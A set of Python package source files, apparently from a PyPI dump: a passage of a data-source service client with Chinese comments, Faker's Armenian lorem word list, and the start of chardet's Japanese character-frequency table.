# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def size(self, fd_code: str):
"""
获取数据的条数
:param fd_code: fd的唯一code
:return: 数据的条数 没得就返回0
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/size",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return r
else:
return 0
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def is_empty(self, fd_code: str):
"""
判断数据集是否为空
:param fd_code: fd的唯一code
:return: 如果为空返回True,否则返回False
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/empty",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return r
else:
return True
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def collect(self, fd_code: str, offset: int, size: int, only_model_field: bool = False):
"""
返回整个数据集
:param offset:
:param only_model_field:是否只返回模型里面的字段
:param size:
:param fd_code: fd的唯一code
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/all", params={'offset': offset, 'size': size, 'onlyModelField': only_model_field},headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def collect_conditions(self, fd_code: str, offset: int, size: int, condition_groups: list, only_model_field: bool = False):
"""
返回指定条数的数据
:param offset:
:param only_model_field:
:param fd_code:
:param size: 返回的条数
:param condition_groups: 查询条件
:return: list
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/conditions", method="post", data=condition_groups,
params={'offset': offset, 'size': size, 'onlyModelField': only_model_field},headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def query(self, fd_code: str, query: str, parameters: dict):
"""
对数据集进行查询
:param fd_code: fd的唯一code
:param query_str: 查询语句
:param parameters: 查询可能涉及的参数 K/V形式
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/query", method="post", data=parameters,
params={'query': query},headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def query_data(self, fd_code: str, query: str, parameters: dict):
"""
对数据集进行查询
:param fd_code: fd的唯一code
:param query: 查询语句
:param parameters: 查询可能涉及的参数 K/V形式
:return:
"""
check_instance_avaliable()
query_parameter = FactDatasourceQueryParameter(query, parameters)
try:
r = do_service(f"/remote/fd-service/{fd_code}/queryData", method="post", data=dict(query_parameter),headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def inserts(self, fd_code: str, result_list: list) -> list:
"""
增加数据
:param fd_code: fd的唯一code
:param result_list: 要被写入的数据 是一个List
:return:
"""
if result_list is None:
return None
if not isinstance(result_list, list):
raise IllegalArgumentException("输入的参数:result_list 不是数组")
check_instance_avaliable()
request = []
for result in result_list:
if not isinstance(result, Munch):
# 这里所有类型都要添加进去
request.append(result)
else:
# 说明是munch的,那么就转成Dict的
request.append(result.toDict())
try:
r = do_service(f"/remote/fd-service/{fd_code}", method="post", data=request, return_type="json",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def updates(self, fd_code: str, result_list: list) -> list:
"""
更新数据
:param fd_code: fd的唯一code
:param result_list: 要被更新的数据 是一个List
:return:
"""
if result_list is None:
return None
if not isinstance(result_list, list):
raise IllegalArgumentException("输入的参数:result_list 不是数组")
check_instance_avaliable()
request = []
for result in result_list:
if not isinstance(result, Munch):
# 这里所有类型都要添加进去
request.append(result)
else:
# 说明是munch的,那么就转成Dict的
request.append(result.toDict())
try:
r = do_service(f"/remote/fd-service/{fd_code}", method="put", data=request, return_type="json",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def save_or_updates(self, fd_code: str, result_list: list) -> list:
"""
新增或更新数据
:param fd_code: fd的唯一code
:param result_list: upsertCache
:return:
"""
if result_list is None:
return None
if not isinstance(result_list, list):
raise IllegalArgumentException("输入的参数:result_list 不是数组")
check_instance_avaliable()
request = []
for result in result_list:
if not isinstance(result, Munch):
# 这里所有类型都要添加进去
request.append(result)
else:
# 说明是munch的,那么就转成Dict的
request.append(result.toDict())
try:
r = do_service(f"/remote/fd-service/{fd_code}/upsert", method="post", data=request, return_type="json",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def delete_all(self, fd_code: str):
"""
删除数据集中所有数据
:param fd_code: fd的唯一code
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}", method="delete", return_type="None",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def delete(self, fd_code: str, query: str):
"""
删除数据集中查询语句命中的数据
:param fd_code: fd的唯一code
:param query_str: 查询语句
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/query", method="delete", params={'query': query},
return_type="None",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def delete_conditions(self, fd_code: str, condition_groups: list):
"""
根据删除条件,构造删除语句
:param fd_code:
:param condition_groups:
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/conditions", method="delete", data=condition_groups,
return_type="None",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def get_fact_datasource_fields(self, fd_code: str):
"""
获取fd的字段
:param fd_code:
:return: List<FactDatasourceField>
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/fields", method="get",
return_type="json", headers={HeaderHolder.SITE: HeaderHolder.get_value(HeaderHolder.SITE),
HeaderHolder.PROJECT_CODE: HeaderHolder.get_value(
HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
def exists_fds(self, fds):
"""
判断fd是否存在
:param fds:
:return:
"""
if fds is None:
return False
if not isinstance(fds, list):
raise IllegalArgumentException("检测fd是否存在失败,输入参数不是一个list")
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/exists", method="post", data=fds,headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return r
else:
return False
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
# 说明服务器端报错了
raise ServiceInnerException(e.response._content.decode('utf-8'))
elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
# 说明是认证相关的错误
raise AuthException(f"服务端异常 {str(e)} {e.response._content.decode('utf-8')}")
raise e
@Value("${sobeycube.factdatasource.distributed-mode:False}")
def distributed_mode():
pass
class FactDatasourceProxyFactory(Singleton):
__instance = None
def get_fd_client_proxy(self, mode: bool = None) -> FactDatasourceProxy:
if self.__instance:
return self.__instance
if mode is None:
mode = distributed_mode()
if mode:
log.info("服务启动,使用本地模式FD服务")
# 获取本地操作实例
self.__instance = DistributedFactDatasourceProxy.instance()
else:
log.info("服务启动,使用中心模式FD服务")
self.__instance = CentralizedFactDatasourceProxy.instance()
return self.__instance
def fd_client_proxy() -> FactDatasourceProxy:
return FactDatasourceProxyFactory.instance().get_fd_client_proxy() | PypiClean |
/Faker-19.3.1.tar.gz/Faker-19.3.1/faker/providers/lorem/hy_AM/__init__.py | from typing import Dict
from .. import Provider as LoremProvider
class Provider(LoremProvider):
"""Implement lorem provider for ``hy_AM`` locale.
Sources:
- https://www.101languages.net/armenian/armenian-word-list
"""
word_list = (
"ես",
"դու",
"նա",
"մենք",
"դուք",
"նրանք",
"այս",
"այն",
"այստեղ",
"այնտեղ",
"ով",
"ինչ",
"որտեղ",
"ուր",
"երբ",
"ինչպես",
"ոչ",
"բոլոր",
"շատ",
"որոշ",
"քիչ",
"այլ",
"ուրիշ",
"մեկ",
"երկու",
"երեք",
"չորս",
"հինգ",
"մեծ",
"երկար",
"լայն",
"հաստ",
"ծանր",
"փոքր",
"կարճ",
"նեղ",
"բարակ",
"կին",
"տղամարդ",
"մարդ",
"երեխա",
"կին",
"ամուսին",
"մայր",
"հայր",
"կենդանի",
"ձուկ",
"թռչուն",
"շուն",
"ոջիլ",
"օձ",
"ճիճու",
"ծառ",
"անտառ",
"փայտ",
"պտուղ",
"սերմ",
"տերև",
"արմատ",
"կեղև",
"ծաղիկ",
"խոտ",
"պարան",
"մաշկ",
"կաշի",
"միս",
"արյուն",
"ոսկոր",
"ճարպ",
"ձու",
"եղջյուր",
"պոզ",
"պոչ",
"փետուր",
"մազ",
"գլուխ",
"ականջ",
"աչք",
"քիթ",
"բերան",
"ատամ",
"լեզու",
"եղունգ",
"ոտք",
"ծունկ",
"ձեռք",
"թև",
"փոր",
"փորոտիք",
"աղիք",
"վիզ",
"մեջք",
"կուրծք",
"սիրտ",
"լյարդ",
"խմել",
"ուտել",
"կծել",
"ծծել",
"թքել",
"ործկալ",
"փչել",
"շնչել",
"ծիծաղել",
"տեսնել",
"լսել",
"իմանալ",
"գիտենալ",
"մտածել",
"զգալ",
"վախենալ",
"քնել",
"ապրել",
"մեռնել",
"սպանել",
"կռվել",
"որսալ",
"խփել",
"հարվածել",
"կտրել",
"բաժանել",
"խոցել",
"քերծել",
"քորել",
"փորել",
"լողալ",
"թռչել",
"քայլել",
"գալ",
"պառկել",
"նստել",
"կանգնել",
"շրջվել",
"ընկնել",
"տալ",
"պահել",
"բռնել",
"սեղմել",
"շփել",
"լվալ",
"սրբել",
"ձգել",
"քաշել",
"հրել",
"նետել",
"կապել",
"կարել",
"հաշվել",
"ասել",
"երգել",
"խաղալ",
"լողալ",
"հոսել",
"սառչել",
"ուռել",
"արև",
"լուսին",
"աստղ",
"ջուր",
"անձրև",
"գետ",
"լիճ",
"ծով",
"աղ",
"քար",
"ավազ",
"փոշի",
"հող",
"ամպ",
"մառախուղ",
"մշուշ",
"երկինք",
"քամի",
"ձյուն",
"սառույց",
"ծուխ",
"հուր",
"կրակ",
"մոխիր",
"վառվել",
"այրվել",
"ճամփա",
"ճանապարհ",
"լեռ",
"սար",
"կարմիր",
"կանաչ",
"դեղին",
"սպիտակ",
"սև",
"գիշեր",
"օր",
"տարի",
"տաք",
"ցուրտ",
"լիքը",
"նոր",
"հին",
"լավ",
"վատ",
"փտած",
"կեղտոտ",
"ուղիղ",
"կլոր",
"սուր",
"բութ",
"հարթ",
"թաց",
"չոր",
"ճիշտ",
"մոտ",
"հեռու",
"աջ",
)
parts_of_speech: Dict[str, tuple] = {} | PypiClean |
/OBITools-1.2.13.tar.gz/OBITools-1.2.13/distutils.ext/obidistutils/serenity/pip/_vendor/requests/packages/chardet/jisfreq.py |
# Sampling from about 20M text materials include literature and computer technology
#
# Japanese frequency table, applied to both S-JIS and EUC-JP
# They are sorted in order.
# 128 --> 0.77094
# 256 --> 0.85710
# 512 --> 0.92635
# 1024 --> 0.97130
# 2048 --> 0.99431
#
# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58
# Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191
#
# Typical Distribution Ratio, 25% of IDR
JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0
# Char to FreqOrder table ,
JIS_TABLE_SIZE = 4368
JISCharToFreqOrder = (
40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16
3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32
1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48
2042,1061,1062, 48, 49, 44, 45, 433, 434,1040,1041, 996, 787,2997,1255,4305, # 64
2108,4609,1684,1648,5073,5074,5075,5076,5077,5078,3687,5079,4610,5080,3927,3928, # 80
5081,3296,3432, 290,2285,1471,2187,5082,2580,2825,1303,2140,1739,1445,2691,3375, # 96
1691,3297,4306,4307,4611, 452,3376,1182,2713,3688,3069,4308,5083,5084,5085,5086, # 112
5087,5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102, # 128
5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,4097,5113,5114,5115,5116,5117, # 144
5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133, # 160
5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149, # 176
5150,5151,5152,4612,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164, # 192
5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,1472, 598, 618, 820,1205, # 208
1309,1412,1858,1307,1692,5176,5177,5178,5179,5180,5181,5182,1142,1452,1234,1172, # 224
1875,2043,2149,1793,1382,2973, 925,2404,1067,1241, 960,1377,2935,1491, 919,1217, # 240
1865,2030,1406,1499,2749,4098,5183,5184,5185,5186,5187,5188,2561,4099,3117,1804, # 256
2049,3689,4309,3513,1663,5189,3166,3118,3298,1587,1561,3433,5190,3119,1625,2998, # 272
3299,4613,1766,3690,2786,4614,5191,5192,5193,5194,2161, 26,3377, 2,3929, 20, # 288
3691, 47,4100, 50, 17, 16, 35, 268, 27, 243, 42, 155, 24, 154, 29, 184, # 304
4, 91, 14, 92, 53, 396, 33, 289, 9, 37, 64, 620, 21, 39, 321, 5, # 320
12, 11, 52, 13, 3, 208, 138, 0, 7, 60, 526, 141, 151,1069, 181, 275, # 336
1591, 83, 132,1475, 126, 331, 829, 15, 69, 160, 59, 22, 157, 55,1079, 312, # 352
109, 38, 23, 25, 10, 19, 79,5195, 61, 382,1124, 8, 30,5196,5197,5198, # 368
5199,5200,5201,5202,5203,5204,5205,5206, 89, 62, 74, 34,2416, 112, 139, 196, # 384
271, 149, 84, 607, 131, 765, 46, 88, 153, 683, 76, 874, 101, 258, 57, 80, # 400
32, 364, 121,1508, 169,1547, 68, 235, 145,2999, 41, 360,3027, 70, 63, 31, # 416
43, 259, 262,1383, 99, 533, 194, 66, 93, 846, 217, 192, 56, 106, 58, 565, # 432
280, 272, 311, 256, 146, 82, 308, 71, 100, 128, 214, 655, 110, 261, 104,1140, # 448
54, 51, 36, 87, 67,3070, 185,2618,2936,2020, 28,1066,2390,2059,5207,5208, # 464
5209,5210,5211,5212,5213,5214,5215,5216,4615,5217,5218,5219,5220,5221,5222,5223, # 480
5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,3514,5237,5238, # 496
5239,5240,5241,5242,5243,5244,2297,2031,4616,4310,3692,5245,3071,5246,3598,5247, # 512
4617,3231,3515,5248,4101,4311,4618,3808,4312,4102,5249,4103,4104,3599,5250,5251, # 528
5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267, # 544
5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283, # 560
5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299, # 576
5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315, # 592
5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331, # 608
5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347, # 624
5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363, # 640
5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379, # 656
5380,5381, 363, 642,2787,2878,2788,2789,2316,3232,2317,3434,2011, 165,1942,3930, # 672
3931,3932,3933,5382,4619,5383,4620,5384,5385,5386,5387,5388,5389,5390,5391,5392, # 688
5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408, # 704
5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424, # 720
5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440, # 736
5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456, # 752
5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472, # 768
5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488, # 784
5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504, # 800
5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520, # 816
5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536, # 832
5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552, # 848
5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568, # 864
5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584, # 880
5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600, # 896
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616, # 912
5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632, # 928
5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648, # 944
5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664, # 960
5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680, # 976
5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696, # 992
5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712, # 1008
5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728, # 1024
5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744, # 1040
5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760, # 1056
5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776, # 1072
5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792, # 1088
5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808, # 1104
5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824, # 1120
5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840, # 1136
5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856, # 1152
5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872, # 1168
5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888, # 1184
5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904, # 1200
5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, # 1216
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936, # 1232
5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952, # 1248
5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968, # 1264
5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984, # 1280
5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000, # 1296
6001,6002,6003,6004,6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016, # 1312
6017,6018,6019,6020,6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032, # 1328
6033,6034,6035,6036,6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048, # 1344
6049,6050,6051,6052,6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064, # 1360
6065,6066,6067,6068,6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080, # 1376
6081,6082,6083,6084,6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096, # 1392
6097,6098,6099,6100,6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112, # 1408
6113,6114,2044,2060,4621, 997,1235, 473,1186,4622, 920,3378,6115,6116, 379,1108, # 1424
4313,2657,2735,3934,6117,3809, 636,3233, 573,1026,3693,3435,2974,3300,2298,4105, # 1440
854,2937,2463, 393,2581,2417, 539, 752,1280,2750,2480, 140,1161, 440, 708,1569, # 1456
665,2497,1746,1291,1523,3000, 164,1603, 847,1331, 537,1997, 486, 508,1693,2418, # 1472
1970,2227, 878,1220, 299,1030, 969, 652,2751, 624,1137,3301,2619, 65,3302,2045, # 1488
1761,1859,3120,1930,3694,3516, 663,1767, 852, 835,3695, 269, 767,2826,2339,1305, # 1504
896,1150, 770,1616,6118, 506,1502,2075,1012,2519, 775,2520,2975,2340,2938,4314, # 1520
3028,2086,1224,1943,2286,6119,3072,4315,2240,1273,1987,3935,1557, 175, 597, 985, # 1536
3517,2419,2521,1416,3029, 585, 938,1931,1007,1052,1932,1685,6120,3379,4316,4623, # 1552
804, 599,3121,1333,2128,2539,1159,1554,2032,3810, 687,2033,2904, 952, 675,1467, # 1568
3436,6121,2241,1096,1786,2440,1543,1924, 980,1813,2228, 781,2692,1879, 728,1918, # 1584
3696,4624, 548,1950,4625,1809,1088,1356,3303,2522,1944, 502, 972, 373, 513,2827, # 1600
586,2377,2391,1003,1976,1631,6122,2464,1084, 648,1776,4626,2141, 324, 962,2012, # 1616
2177,2076,1384, 742,2178,1448,1173,1810, 222, 102, 301, 445, 125,2420, 662,2498, # 1632
277, 200,1476,1165,1068, 224,2562,1378,1446, 450,1880, 659, 791, 582,4627,2939, # 1648
3936,1516,1274, 555,2099,3697,1020,1389,1526,3380,1762,1723,1787,2229, 412,2114, # 1664
1900,2392,3518, 512,2597, 427,1925,2341,3122,1653,1686,2465,2499, 697, 330, 273, # 1680
380,2162, 951, 832, 780, 991,1301,3073, 965,2270,3519, 668,2523,2636,1286, 535, # 1696
1407, 518, 671, 957,2658,2378, 267, 611,2197,3030,6123, 248,2299, 967,1799,2356, # 1712
850,1418,3437,1876,1256,1480,2828,1718,6124,6125,1755,1664,2405,6126,4628,2879, # 1728
2829, 499,2179, 676,4629, 557,2329,2214,2090, 325,3234, 464, 811,3001, 992,2342, # 1744
2481,1232,1469, 303,2242, 466,1070,2163, 603,1777,2091,4630,2752,4631,2714, 322, # 1760
2659,1964,1768, 481,2188,1463,2330,2857,3600,2092,3031,2421,4632,2318,2070,1849, # 1776
2598,4633,1302,2254,1668,1701,2422,3811,2905,3032,3123,2046,4106,1763,1694,4634, # 1792
1604, 943,1724,1454, 917, 868,2215,1169,2940, 552,1145,1800,1228,1823,1955, 316, # 1808
1080,2510, 361,1807,2830,4107,2660,3381,1346,1423,1134,4108,6127, 541,1263,1229, # 1824
1148,2540, 545, 465,1833,2880,3438,1901,3074,2482, 816,3937, 713,1788,2500, 122, # 1840
1575, 195,1451,2501,1111,6128, 859, 374,1225,2243,2483,4317, 390,1033,3439,3075, # 1856
2524,1687, 266, 793,1440,2599, 946, 779, 802, 507, 897,1081, 528,2189,1292, 711, # 1872
1866,1725,1167,1640, 753, 398,2661,1053, 246, 348,4318, 137,1024,3440,1600,2077, # 1888
2129, 825,4319, 698, 238, 521, 187,2300,1157,2423,1641,1605,1464,1610,1097,2541, # 1904
